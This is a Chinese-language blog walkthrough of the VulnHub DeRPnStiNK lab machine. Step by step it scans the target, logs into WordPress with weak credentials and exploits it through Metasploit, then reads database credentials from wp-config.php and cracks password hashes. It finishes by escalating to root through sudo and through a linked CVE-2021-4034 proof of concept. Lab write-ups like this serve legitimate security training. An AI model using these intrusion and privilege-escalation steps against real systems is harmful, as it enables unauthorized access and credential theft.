难度 : 中等

本文最后更新于 2023年12月25日 16:24

VulnHub2018_DeRPnStiNK靶机提权

“春心莫共花争发,一寸相思一寸灰!. ”

目标信息

描述:
难度等级 : 简单
目标:获得flag
前期准备:
靶机地址:https://www.vulnhub.com/entry/de-rpnn-sti-nk,2018/

1)扫描端口以及ip

首先对当前网段进行一个快速扫描

1
nmap -sS 192.168.213.0/24

image.png
在对靶机IP进行一个详细扫描

1
nmap -sV -p- 192.168.213.138

image.png
可对当前信息做一个搜集和记录

2)对网页进行一个信息搜集

image.png|425
这里看到一个网络笔记信息对他进行一个访问
image.png|475
意思是要我们更新本地的dns服务,才能访问博客!
windows host文件存放位置:
C:\Windows\System32\drivers\etc\hosts
请注意,这是一个系统文件,因此您可能需要管理员权限才能编辑它。如果您尝试修改 hosts 文件,请确保以管理员身份运行文本编辑器,否则您可能无法保存更改。
方法:管理员身份运行cmd,输入notepad回车,在记事本里直接点击文件-打开,选择路径:C:\Windows\System32\drivers\etc,继续选择所有文件,然后打开hosts文件,最后添加ctrl+s保存即可
Linux host文件存放位置:
在 Linux 系统中,/etc/hosts 文件用于将主机名映射到 IP 地址。这个文件允许您在不使用 DNS 的情况下执行本地主机名解析。
image.png|425
192.168.213.138 derpnstink.local
尝试通过浏览器访问这个本地域名。在浏览器中输入 http://derpnstink.local/ 并按下 Enter 键,看看是否能够访问相应的服务或页面。
image.png|450
发现flag1进行一个信息记录
<–flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) –> MD5在线解密
image.png|450
澳大利亚的意思

2)扫描敏感目录

1
dirb http://derpnstink.local/

image.png
找的wordpress站!
image.png
image.png|525
可以对这个进行一个密码爆破
发现他是弱账号密码:admin/admin
|425
phpMyAdmin登录页面
phpMyAdmin 是一个用于管理 MySQL 数据库的免费、开源的Web应用程序。它提供了一个直观的用户界面,通过Web浏览器,用户可以轻松地执行数据库管理任务,如创建、删除和修改数据库,执行 SQL 查询,管理用户权限等。
image.png|450

3)awvs进行扫描

对wordpreess站进行扫描看有没有什么漏洞

1
http://derpnstink.local/weblog/

image.png|450
发现有一个Slideshow Gallery这个漏洞
image.png|450

4)msf利用

  1. 进入msfconsole
  2. 查找slideshow gallery漏洞:
    1
    search slideshow gallery
    image.png|425
  3. use 0 选择这个模块
  4. show options 看他需要配置哪些信息
  5. set Rhosts 192.168.213.133
  6. set targeturi /weblog
    用于指定目标系统上要执行渗透测试的特定 Web 目录路径。
  7. set wp_password admin
  8. set wp_user admin
  9. run

5)获得shell

image.png
shell
python -c 'import pty; pty.spawn("/bin/bash")'

  • 回到/var/www/html/weblog查看信息
    image.png|375
  • 发现wp-config.php文件,应该是个配置文件,cat查看一下
  • 获取到mysql账号密码
    cat wp-config.php
    image.png|450
    mysql账号密码获得:
    root
    mysql

登陆MySQL
mysql -u root -p
查看有哪些库:
image.png|450
进入use wordpress;
查看这个数据库有哪些表:show tables;
image.png|325
查看表内容:select * from wp_users \G;
image.png|325
对此密码进行爆破:新建一个txt文本将密码复制进去
image.png|475
得到密码:wedgie57
登陆unclestinky得到flag2
image.png|425
image.png|425
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
MD5在线解密
image.png|500
意思为墨西哥
回到home目录下发现两个用户名:
image.png|475
上面做了信息收集他开起了ftp和ssh端口尝试用刚才的密码进行这两个登陆
发现ftp用stinky可以登录并发现一个key.txt的文本文件
image.png|400
提供了一个RSA私钥
image.png|300
进行ssh登陆:

1
2
3
4
5
6
将使用密钥登录,将密钥文件key.txt权限设置为700
chmod 700 key.txt
#它将文件 `key.txt` 的权限设置为只有文件所有者有读、写、执行的权限,而其他用户没有任何权限。
ssh -i key.txt stinky@192.168.213.138 -o PubkeyAcceptedKeyTypes=+ssh-rsa
`-i key.txt`: 指定要使用的私钥文件。在这里,`key.txt` 应该是你的私钥文件。
`-o PubkeyAcceptedKeyTypes=+ssh-rsa`: 这个选项用于指定接受的公钥算法类型。在这里,`+ssh-rsa` 表示接受 SSH-RSA 算法的公钥。这是为了明确指定使用 RSA 算法的公钥进行身份验证。

image.png
找到flag3
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
MD5在线解密
image.png|475
巴西
然后我们去找一下那个流量包,在Documents目录下发现derpissues.pcap
你提到了一个名为 “derpissues.pcap” 的文件,文件扩展名 .pcap 通常表示数据包捕获文件。这类文件通常是使用网络监控工具(如Wireshark或tcpdump)生成的,包含捕获的网络流量。
开启python3让kali下载下这个流量文件包
python3 -m http.server 6666
kali下载:
wget 192.168.213.138:6666/derpissues.pcap
打开wireshark对这个流量包进行分析
过滤http协议
image.png|400
找到他修改的另一个用户名和密码
mrderp
derpderpderpderpderpderpderp
image.png|400

6)提权

ssh登陆mrderp用户
ssh mrderp@192.168.213.138
发现sudo可以提权
image.png
cd /home/mrderp/binaries
image.png
执行这个文件:sudo ./derpy.sh
image.png
cd /root/Desktop下flag4
image.png

另一种提权直接在stinky用户下
cve-2021-4034
https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c
image.png|400
下载到kali上,用python3 -m http.server 80下载在对他进行编译
gcc cve-2021-4034-poc.c -o dayu
使用 GCC 编译一个名为 cve-2021-4034-poc.c 的源代码文件,并将输出的可执行文件命名为 dayu。这种编译的命令通常是用来构建漏洞利用或漏洞验证代码的可执行文件。
chmod +x dayu
添加可执行权限给名为 dayu 的文件。通过执行这个命令,你允许文件 dayu 被作为一个可执行文件运行。
./dayu
执行名为 dayu 的可执行文件


VulnHub2018_DeRPnStiNK 靶机提权
http://example.com/posts/afec9646/
作者
帅蛋同学_
发布于
2023年12月25日 00:00
更新于
2023年12月25日 16:24
许可协议